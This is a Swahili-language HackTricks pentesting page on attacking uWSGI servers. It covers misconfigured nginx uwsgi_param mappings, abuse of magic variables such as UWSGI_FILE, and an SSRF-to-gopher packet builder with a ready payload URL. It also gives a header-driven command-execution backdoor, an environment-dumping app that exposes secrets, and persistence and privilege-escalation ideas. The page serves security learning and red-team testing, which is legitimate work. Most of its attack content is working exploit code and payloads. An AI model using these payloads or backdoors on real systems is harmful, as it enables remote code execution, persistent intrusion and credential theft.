WSGI Post-Exploitation Tricks

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

WSGI Muhtasari

Web Server Gateway Interface (WSGI) ni spesifikisho linaloelezea jinsi web server inavyowasiliana na web applications, na jinsi web applications zinavyoweza kupangiliwa pamoja kuchakata ombi moja. uWSGI ni mojawapo ya servers maarufu za WSGI, mara nyingi ikitumiwa kuhudumia Python web applications. Usafirishaji wake wa binary asilia ni protocol ya uwsgi (herufi ndogo) ambayo inabeba kundi la key/value parameters (“uwsgi params”) kwa backend application server.

Kurasa zinazohusiana ambazo unaweza pia kutaka kuangalia:

Werkzeug / Flask Debug

SSRF (Server Side Request Forgery)

uWSGI Magic Variables Exploitation

uWSGI hutoa maalum “magic variables” ambazo zinaweza kubadilisha jinsi instance inavyopakia na kupeleka applications. Variables hizi si HTTP headers za kawaida — ni uwsgi parameters zinazopelekwa ndani ya request ya uwsgi/SCGI/FastCGI kutoka reverse proxy (nginx, Apache mod_proxy_uwsgi, n.k.) kwenda backend ya uWSGI. Ikiwa configuration ya proxy inaweka data iliyodhibitiwa na mtumiaji ndani ya uwsgi parameters (kwa mfano kupitia $arg_*, $http_*, au endpoints zilizo wazi kwa njia isiyo salama zinazoongea uwsgi protocol), washambuliaji wanaweza kuweka variables hizi na kufikia code execution.

Ramani hatarishi katika proxies za mbele (mfano nginx)

Marekebisho mabaya kama yafuatayo yanafunua moja kwa moja uWSGI magic variables kwa ingizo la mtumiaji:

location /app/ {
include uwsgi_params;
# DANGEROUS: maps query args into uwsgi params
uwsgi_param UWSGI_FILE $arg_f;                 # /app/?f=/tmp/backdoor.py
uwsgi_param UWSGI_MODULE $http_x_mod;          # header: X-Mod: pkg.mod
uwsgi_param UWSGI_CALLABLE $arg_c;             # /app/?c=application
uwsgi_pass unix:/run/uwsgi/app.sock;
}

Ikiwa app au kipengele cha upload kinaruhusu kuandika faili katika njia inayoweza kutabiriwa, kuichanganya na mappings hapo juu kwa kawaida husababisha RCE mara moja wakati backend inapakia faili/module inayodhibitiwa na mshambuliaji.

Vigezo Muhimu Vinavyoweza Kutumiwa

UWSGI_FILE - Kupakia/Kutekeleza faili yoyote

uwsgi_param UWSGI_FILE /path/to/python/file.py;

Inapakia na kutekeleza faili yoyote ya Python kama programu ya WSGI. Iwapo mshambuliaji anaweza kudhibiti kigezo hiki kupitia uwsgi param bag, wanaweza kufanikisha Remote Code Execution (RCE).

UWSGI_SCRIPT - Kupakia Skripti

uwsgi_param UWSGI_SCRIPT module.path:callable;
uwsgi_param SCRIPT_NAME /endpoint;

Inapakia skripti iliyobainishwa kama programu mpya. Ikiwa ikichanganywa na uwezo wa kupakia faili au kuandika, inaweza kusababisha RCE.

UWSGI_MODULE na UWSGI_CALLABLE - Kupakia Moduli kwa Dinamiki

uwsgi_param UWSGI_MODULE malicious.module;
uwsgi_param UWSGI_CALLABLE evil_function;
uwsgi_param SCRIPT_NAME /backdoor;

Parameta hizi zinawezesha kupakia Python modules yoyote na kuwaita functions maalum ndani yao.

UWSGI_SETENV - Ubadilishaji wa vigezo vya mazingira

uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;

Inaweza kutumika kubadilisha environment variables, na kuna uwezekano wa kuathiri tabia ya application au kupakia configuration yenye madhara.

UWSGI_PYHOME - Ubadilishaji wa Mazingira ya Python

uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;

Hubadilisha Python virtual environment, inaweza kupakia packages hatarishi au interpreters tofauti za Python.

UWSGI_CHDIR - Mabadiliko ya saraka

uwsgi_param UWSGI_CHDIR /etc/;

Inabadilisha saraka ya kazi kabla ya kushughulikia maombi na inaweza kuchanganywa na vipengele vingine.

SSRF + uwsgi protocol (gopher) pivot

Mfano wa tishio

Ikiwa app ya wavuti ya lengo ina SSRF primitive na instance ya uWSGI inasikiliza kwenye soketi ya TCP ya ndani (kwa mfano, socket = 127.0.0.1:3031), unaweza kuzungumza raw uwsgi protocol kupitia gopher na kuingiza vigezo vya uWSGI vya magic.

Hii inawezekana kwa sababu deployments nyingi zinatumia soketi ya uwsgi isiyo-HTTP ndani; reverse proxy (nginx/Apache) inatafsiri HTTP ya mteja kuwa kwenye uwsgi param bag. Kwa SSRF+gopher unaweza kutengeneza moja kwa moja uwsgi binary packet na kuweka vigezo hatari kama UWSGI_FILE.

uWSGI protocol structure (quick reference)

  • Kichwa (4 bytes): modifier1 (1 byte), datasize (2 bytes little-endian), modifier2 (1 byte)
  • Mwili: mlolongo wa [key_len(2 LE)] [key_bytes] [val_len(2 LE)] [val_bytes]

Kwa requests za kawaida modifier1 ni 0. Mwili una vigezo vya uwsgi kama SERVER_PROTOCOL, REQUEST_METHOD, PATH_INFO, UWSGI_FILE, n.k. Angalia spec rasmi ya protocol kwa maelezo kamili.

Mjenzi wa packet mdogo (generate gopher payload)

import struct, urllib.parse

def uwsgi_gopher_url(host, port, params):
body = b''.join([struct.pack('<H', len(k))+k.encode()+struct.pack('<H', len(v))+v.encode() for k,v in params.items()])
pkt  = bytes([0]) + struct.pack('<H', len(body)) + bytes([0]) + body
return f"gopher://{host}:{port}/_" + urllib.parse.quote_from_bytes(pkt)

# Example URL:
gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json

Mfano wa matumizi ili force-load faili iliyokuwa imeandikwa awali kwenye seva:

params = {
'SERVER_PROTOCOL':'HTTP/1.1', 'REQUEST_METHOD':'GET', 'PATH_INFO':'/',
'UWSGI_FILE':'/app/profiles/malicious.py', 'SCRIPT_NAME':'/malicious.py'
}
print(uwsgi_gopher_url('127.0.0.1', 3031, params))

Tuma URL iliyotengenezwa kupitia SSRF sink.

Mfano uliotekelezwa

Ikiwa unaweza kuandika faili ya python kwenye diski (ugani haujali) yenye msimbo kama:

# /app/profiles/malicious.py
import os
os.system('/readflag > /app/profiles/result.txt')

def application(environ, start_response):
start_response('200 OK', [('Content-Type','text/plain')])
return [b'ok']

Tengeneza na chochea gopher payload ambayo inaweka UWSGI_FILE kwenye njia hii. Backend itaiingiza na kuitekeleza kama app ya WSGI.

Post-Exploitation Techniques

1. Persistent Backdoors

File-based Backdoor

# backdoor.py
import subprocess, base64

def application(environ, start_response):
cmd = environ.get('HTTP_X_CMD', '')
if cmd:
result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
else:
response = 'Backdoor active'
start_response('200 OK', [('Content-Type', 'text/plain')])
return [response.encode()]

Pakia kwa kutumia UWSGI_FILE na uifikie chini ya SCRIPT_NAME uliyoichagua.

Environment-based Persistence

uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.11/site-packages;

2. Ufunuo wa Taarifa

Environment Variable Dumping

# env_dump.py
import os, json

def application(environ, start_response):
env_data = {'os_environ': dict(os.environ), 'wsgi_environ': dict(environ)}
start_response('200 OK', [('Content-Type', 'application/json')])
return [json.dumps(env_data, indent=2).encode()]

Ufikiaji wa Mfumo wa Faili

Unganisha UWSGI_CHDIR na msaidizi wa kuhudumia faili ili kuvinjari saraka nyeti.

3. Privilege Escalation ideas

  • Ikiwa uWSGI inaendesha kwa ruhusa zilizoinuliwa na inaandika sockets/pids zinazo milikiwa na root, kutumia vibaya env na mabadiliko ya saraka kunaweza kukusaidia kuweka faili zinazo milikiwa na wamiliki wenye ruhusa au kuingilia hali ya runtime.
  • Kuandika upya mipangilio kupitia environment (UWSGI_*) ndani ya faili iliyopakiwa kupitia UWSGI_FILE kunaweza kuathiri process model na workers na kufanya persistence iwe fiche zaidi.
# malicious_config.py
import os

# Override uWSGI configuration
os.environ['UWSGI_MASTER'] = '1'
os.environ['UWSGI_PROCESSES'] = '1'
os.environ['UWSGI_CHEAPER'] = '1'

Reverse-proxy desync issues relevant to uWSGI chains (recent)

Matumizi yanayotumia Apache httpd na mod_proxy_uwsgi yamekumbana na mdudu wa hivi karibuni wa response-splitting/desynchronization ambao unaweza kuathiri safu ya tafsiri ya frontend↔backend:

  • CVE-2023-27522 (Apache httpd 2.4.30–2.4.55; pia inayohusiana na uWSGI integration kabla ya kurekebishwa katika 2.0.22/2.0.26): crafted origin response headers zinaweza kusababisha HTTP response smuggling wakati mod_proxy_uwsgi inatumiwa. Kuinua Apache hadi ≥2.4.56 kunapunguza tatizo.
  • CVE-2024-24795 (irekebishwe katika Apache httpd 2.4.59; uWSGI 2.0.26 ilibadilisha integration yake na Apache): HTTP response splitting katika modules kadhaa za httpd inaweza kusababisha desync wakati backends zinapochangia headers. Katika changelog ya uWSGI 2.0.26 hii inaonekana kama “let httpd handle CL/TE for non-http handlers.”

Hizi hazitatoa moja kwa moja RCE katika uWSGI, lakini kwa kesi za pembeni zinaweza kuunganishwa na header injection au SSRF ili kugeuka kuelekea uwsgi backend. Wakati wa majaribio, fingerprint proxy na toleo na uzingatie desync/smuggling primitives kama njia ya kuingia kwenye backend-only routes na sockets.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks